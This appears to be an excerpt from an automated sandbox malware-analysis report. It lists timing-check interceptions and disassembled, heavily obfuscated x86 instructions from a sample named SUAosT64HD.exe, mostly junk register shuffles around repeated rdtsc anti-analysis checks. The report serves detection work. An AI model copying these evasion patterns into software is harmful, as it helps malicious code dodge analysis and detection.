Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F07B3 second address: 54F0843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e movzx esi, di 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 je 00007FC3C259850Bh 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC3507E5380h 0x00000022 xor cx, 6668h 0x00000027 jmp 00007FC3507E537Bh 0x0000002c popfd 0x0000002d mov ah, 64h 0x0000002f popad 0x00000030 mov ecx, eax 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FC3507E5381h 0x00000039 or cx, B086h 0x0000003e jmp 00007FC3507E5381h 0x00000043 popfd 0x00000044 jmp 00007FC3507E5380h 0x00000049 popad 0x0000004a xor eax, dword ptr [ebp+08h] 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0843 second address: 54F0847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0847 second address: 54F084B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F084B second address: 54F0851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0851 second address: 54F0865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5380h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0865 second address: 54F087F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F087F second address: 54F0883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0883 second address: 54F0887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0887 second address: 54F088D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F088D second address: 54F08A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov esi, 6A3DAA83h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F08A5 second address: 54F08B2 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 mov dx, si 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F08B2 second address: 54F08D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 leave 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC350C3E724h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F08D1 second address: 54F08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F08D5 second address: 54F08DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F09FA second address: 54F0A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A000A second address: 54A00F0 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC350C3E724h 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007FC350C3E721h 0x00000014 pushfd 0x00000015 jmp 00007FC350C3E720h 0x0000001a jmp 00007FC350C3E725h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FC350C3E71Eh 0x00000027 mov ebp, esp 0x00000029 jmp 00007FC350C3E720h 0x0000002e and esp, FFFFFFF8h 0x00000031 pushad 0x00000032 mov di, si 0x00000035 mov ah, 18h 0x00000037 popad 0x00000038 push ecx 0x00000039 pushad 0x0000003a mov ecx, 1CD9B7C7h 0x0000003f pushfd 0x00000040 jmp 00007FC350C3E71Ch 0x00000045 and ecx, 7785F478h 0x0000004b jmp 00007FC350C3E71Bh 0x00000050 popfd 0x00000051 popad 0x00000052 mov dword ptr [esp], ecx 0x00000055 jmp 00007FC350C3E726h 0x0000005a xchg eax, ebx 0x0000005b jmp 00007FC350C3E720h 0x00000060 push eax 0x00000061 jmp 00007FC350C3E71Bh 0x00000066 xchg eax, ebx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A00F0 second address: 54A00F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A00F4 second address: 54A00FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A00FA second address: 54A01B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 call 00007FC3507E5385h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebx, dword ptr [ebp+10h] 0x00000012 jmp 00007FC3507E5387h 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 push ecx 0x0000001a mov ecx, edi 0x0000001c pop edx 0x0000001d pushfd 0x0000001e jmp 00007FC3507E537Ch 0x00000023 add si, 5528h 0x00000028 jmp 00007FC3507E537Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007FC3507E5389h 0x00000035 xchg eax, esi 0x00000036 pushad 0x00000037 jmp 00007FC3507E537Ch 0x0000003c mov dl, cl 0x0000003e popad 0x0000003f mov esi, dword ptr [ebp+08h] 0x00000042 jmp 00007FC3507E537Dh 0x00000047 xchg eax, edi 0x00000048 jmp 00007FC3507E537Eh 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FC3507E537Dh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A01B4 second address: 54A01BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A01BA second address: 54A0216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e mov esi, edx 0x00000010 popad 0x00000011 test esi, esi 0x00000013 pushad 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC3507E5381h 0x0000001b add cl, 00000016h 0x0000001e jmp 00007FC3507E5381h 0x00000023 popfd 0x00000024 call 00007FC3507E5380h 0x00000029 pop eax 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edi, 4A0B93E4h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A0216 second address: 54A02B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC3C2A3CB10h 0x0000000b jmp 00007FC350C3E71Fh 0x00000010 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000017 pushad 0x00000018 mov dx, si 0x0000001b popad 0x0000001c je 00007FC3C2A3CB05h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC350C3E723h 0x00000029 sbb eax, 50221F5Eh 0x0000002f jmp 00007FC350C3E729h 0x00000034 popfd 0x00000035 jmp 00007FC350C3E720h 0x0000003a popad 0x0000003b mov edx, dword ptr [esi+44h] 0x0000003e jmp 00007FC350C3E720h 0x00000043 or edx, dword ptr [ebp+0Ch] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 call 00007FC350C3E71Dh 0x0000004e pop eax 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A02B2 second address: 54A02C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5383h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A02C9 second address: 54A02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A02CD second address: 54A02FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop edi 0x00000013 pushfd 0x00000014 jmp 00007FC3507E537Ah 0x00000019 adc ah, 00000048h 0x0000001c jmp 00007FC3507E537Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A02FB second address: 54A0323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC3C2A3CA86h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A0323 second address: 54A032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 513CA5ECh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907A3 second address: 54907A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907A7 second address: 54907AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907AB second address: 54907B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907B1 second address: 54907ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, si 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx eax, di 0x00000019 call 00007FC3507E5387h 0x0000001e pop esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907ED second address: 54907F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907F3 second address: 54907F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907F7 second address: 549081C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC350C3E726h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 549081C second address: 5490820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490820 second address: 5490826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490826 second address: 549082C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 549082C second address: 5490830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490830 second address: 5490834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490834 second address: 5490886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a mov ecx, edi 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FC350C3E71Ah 0x00000013 xchg eax, ebx 0x00000014 jmp 00007FC350C3E720h 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC350C3E71Eh 0x00000021 sub ecx, 571C8D38h 0x00000027 jmp 00007FC350C3E71Bh 0x0000002c popfd 0x0000002d push eax 0x0000002e push edx 0x0000002f mov ax, 8905h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490886 second address: 5490909 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC3507E5382h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 mov ah, F8h 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 jmp 00007FC3507E5385h 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FC3507E537Ch 0x00000023 xor ax, 0928h 0x00000028 jmp 00007FC3507E537Bh 0x0000002d popfd 0x0000002e mov edx, eax 0x00000030 popad 0x00000031 sub ebx, ebx 0x00000033 pushad 0x00000034 mov dx, 9604h 0x00000038 mov cx, di 0x0000003b popad 0x0000003c test esi, esi 0x0000003e jmp 00007FC3507E537Fh 0x00000043 je 00007FC3C25EAE07h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490909 second address: 549090D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 549090D second address: 5490913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490913 second address: 54909C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, CEh 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC350C3E71Dh 0x00000018 and cx, 4956h 0x0000001d jmp 00007FC350C3E721h 0x00000022 popfd 0x00000023 mov ch, AAh 0x00000025 popad 0x00000026 mov ecx, esi 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FC350C3E729h 0x0000002f sbb cx, AD66h 0x00000034 jmp 00007FC350C3E721h 0x00000039 popfd 0x0000003a jmp 00007FC350C3E720h 0x0000003f popad 0x00000040 je 00007FC3C2A44127h 0x00000046 jmp 00007FC350C3E720h 0x0000004b test byte ptr [77326968h], 00000002h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC350C3E727h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54909C8 second address: 54909E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5384h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54909E0 second address: 5490A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FC3C2A440DBh 0x00000011 jmp 00007FC350C3E726h 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 jmp 00007FC350C3E720h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ecx, ebx 0x00000024 mov si, bx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490A2A second address: 5490AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC3507E5380h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FC3507E537Bh 0x0000000f jmp 00007FC3507E5383h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FC3507E5389h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FC3507E5383h 0x00000028 add ah, FFFFFF8Eh 0x0000002b jmp 00007FC3507E5389h 0x00000030 popfd 0x00000031 push eax 0x00000032 pop edi 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490AB3 second address: 5490ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490ABB second address: 5490AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007FC3507E537Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ecx, 1DA5FE77h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A097B second address: 54A09A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6CDA2A0Ah 0x00000008 jmp 00007FC350C3E71Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC350C3E724h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 552089D second address: 55208C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55208C1 second address: 55208C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55208C5 second address: 55208CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55208CB second address: 55208F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC350C3E71Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55208F3 second address: 5520908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5520908 second address: 5520973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC350C3E71Ch 0x00000011 adc ax, 4538h 0x00000016 jmp 00007FC350C3E71Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FC350C3E728h 0x00000022 and si, BF98h 0x00000027 jmp 00007FC350C3E71Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov si, di 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510BB8 second address: 5510BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510BBE second address: 5510BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510BC2 second address: 5510BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510BCE second address: 5510C01 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC350C3E727h 0x00000008 jmp 00007FC350C3E723h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510C01 second address: 5510C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC3507E5384h 0x00000009 pop ecx 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 call 00007FC3507E537Dh 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A0F13 second address: 54A0F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, B8A2h 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FC350C3E722h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC350C3E727h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A0F68 second address: 54A0F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC3507E537Fh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC3507E537Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5520063 second address: 5520069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5520069 second address: 5520098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FC3507E5389h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ecx, 42549645h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 552017D second address: 552019A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 552019A second address: 55201AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C02D9 second address: 54C0334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC350C3E721h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FC350C3E71Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007FC350C3E720h 0x0000001c push FFFFFFFEh 0x0000001e pushad 0x0000001f call 00007FC350C3E71Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0334 second address: 54C0347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 push 2E1EE016h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0347 second address: 54C034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
